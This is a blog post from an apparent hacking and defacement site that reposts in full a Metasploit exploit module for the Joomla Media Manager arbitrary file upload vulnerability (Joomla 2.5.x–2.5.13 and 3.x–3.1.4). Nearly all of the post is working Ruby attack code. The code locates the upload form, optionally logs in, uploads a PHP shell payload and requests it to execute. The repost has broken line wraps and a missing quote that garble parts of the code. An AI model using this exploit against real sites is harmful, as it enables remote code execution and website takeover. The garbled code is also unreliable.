Joomla! Component Media Manager - Arbitrary File Upload (Metasploit) - cowok tersakiti team

Latest

TUTORIAL,HACKING,DEFACE,BLOGGER,ANALIST,ARTICLES,NEWS

BANNER 728X90

Wednesday, March 1, 2017

Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)



##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
 super(update_info(info,
 'Name'           => "Joomla Media Manager 
File Upload Vulnerability",
'Description'    => %q{
 This module exploits a vulnerability found 
in Joomla 2.5.x up to 2.5.13, as well as
3.x up to 3.1.4 versions. The vulnerability 
exists in the Media Manager component,
 which comes by default in Joomla,
 allowing arbitrary file uploads, 
and results in
arbitrary code execution. 
The module has been tested successfully on Joomla 2.5.13
 and 3.1.4 on Ubuntu 10.04. Note:
 If public access isn't allowed to the Media
 Manager, 
you will need to supply a valid username and password (Editor role or
 higher) in order to work properly.
 },
 'License'        => MSF_LICENSE,
      'Author'         =>
        [
Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
'juan vazquez' # Metasploit module
],
'References'     =>
        [
[ 'OSVDB', '95933' ],
[ 'URL', 'http://developer.joomla.org/security/
news/563-20130801-core-unauthorised-uploads' ],
[ 'URL', 'http://www.cso.com.au/article/523528/
joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
[ 'URL', 'https://github.com/joomla/joomla-cms/
commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
 [ 'URL', 'http://niiconsulting.com/checkmate/
2013/08/critical-joomla-file-upload-vulnerability/' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 2.5.x <=2.5.13', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 01 2013",
      'DefaultTarget'  => 0))

      register_options(
 [
  OptString.new('TARGETURI', 
[true, 'The base path to Joomla', '/joomla']),
 OptString.new('USERNAME', [false, 'User to login with', '']),
  OptString.new('PASSWORD', [false, 'Password to login with', '']),
 ], self.class)

  end

  def peer
    return "#{rhost}:#{rport}"
  end

  def check
    res = get_upload_form

if res and res.code == 200
if res.body =~ /You are not authorised to view this resource/
print_status("#{peer} - Joomla Media
 Manager Found but authentication required")
return Exploit::CheckCode::Detected
elsif res.body =~ /<form action="(.*)" 
id="uploadForm"/
print_status("#{peer} - Joomla Media Manager 
Found and authentication isn't required")
  return Exploit::CheckCode::Detected
      end
    end

    return Exploit::CheckCode::Safe
  end

  def upload(upload_uri)
    begin
      u = URI(upload_uri)
    rescue ::URI::InvalidURIError
      fail_with(Exploit::Failure::Unknown, 
"Unable to get the upload_uri correctly")
    end

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, "application/x-php", nil,
 "form-data; name=\"Filedata[]\";
 filename=\"#{@upload_name}.\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => "#{u.path}?#{u.query}",
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'cookie'   => @cookies,
      'vars_get' => {
        'asset'  => 'com_content',
        'author' => '',
        'format' => '',
        'view'   => 'images',
        'folder' => ''
      },
      'data'     => post_data
    })

    return res

  end

  def get_upload_form
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'cookie'   => @cookies,
      'encode_params' => false,
      'vars_get' => {
        'option' => 'com_media',
        'view'   => 'images',
        'tmpl'   => 'component',
        'e_name' => 'jform_articletext',
        'asset'  =>  'com_content',
        'author' => ''
      }
    })

    return res
  end

  def get_login_form

    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path,
 "index.php", "component",
 "users", "/"),
      'cookie'   => @cookies,
      'vars_get' => {
        'view' => 'login'
      }
    })

    return res

  end

  def login
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path,
 "index.php", "component", "users", "/"),
      'cookie'   => @cookies,
      'vars_get' => {
        'task' => 'user.login'
      },
      'vars_post' => {
        'username' => @username,
        'password' => @password
        }.merge(@login_options)
      })

    return res
  end

  def parse_login_options(html)
    html.scan(/<input type="hidden" name="
(.*)" value="(.*)" \/>/) {|option|
      @login_options[option[0]] = option[1] if option[1] ==
 "1" # Searching for the Token Parameter,
 which always has value "1"
    }
  end

  def exploit
    @login_options = {}
    @cookies = ""
    @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
    @username = datastore['USERNAME']
    @password = datastore['PASSWORD']

    print_status("#{peer} - Checking Access to Media Component...")
    res = get_upload_form

    if res and res.code == 200 and res.headers['Set-Cookie']
 and res.body =~ /You are not authorised to view this resource/
      print_status("#{peer} - Authentication required... Proceeding...")

      if @username.empty? or @password.empty?
        fail_with(Exploit::Failure::BadConfig, "#{peer}
      - Authentication is required to access the Media Manager Component,
      please provide credentials")
      end
      @cookies = res.get_cookies.sub(/;$/, "")

      print_status("#{peer} - Accessing the Login Form...")
      res = get_login_form
      if res.nil? or res.code != 200 or res.body !~ /login/
        fail_with(Exploit::Failure::Unknown, "#{peer} - 
    Unable to Access the Login Form")
      end
      parse_login_options(res.body)

      res = login
      if not res or res.code != 303
        fail_with(Exploit::Failure::NoAccess, 
    "#{peer} - Unable to Authenticate")
      end
elsif res and res.code ==200 and res.headers['Set-Cookie']
and res.body =~ /<form action="(.*)" id="uploadForm"/
print_status("#{peer} - Authentication isn't 
required.... Proceeding...")
      @cookies = res.get_cookies.sub(/;$/, "")
    else
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer}
   - Failed to Access the Media Manager Component")
    end

    print_status("#{peer} - Accessing the Upload Form...")
    res = get_upload_form

    if res and res.code == 200 and res.body =~ /<form action="(.*)"
    id="uploadForm"/
      upload_uri = Rex::Text.html_decode($1)
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - 
    Unable to Access the Upload Form")
    end

    print_status("#{peer} - Uploading shell...")

    res = upload(upload_uri)

    if res.nil? or res.code != 200
 fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
    end

    register_files_for_cleanup("#{@upload_name}.")
    print_status("#{peer} - Executing shell...")
send_request_cgi({
 'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "images", @upload_name),
    })

  end

end

No comments:

Post a Comment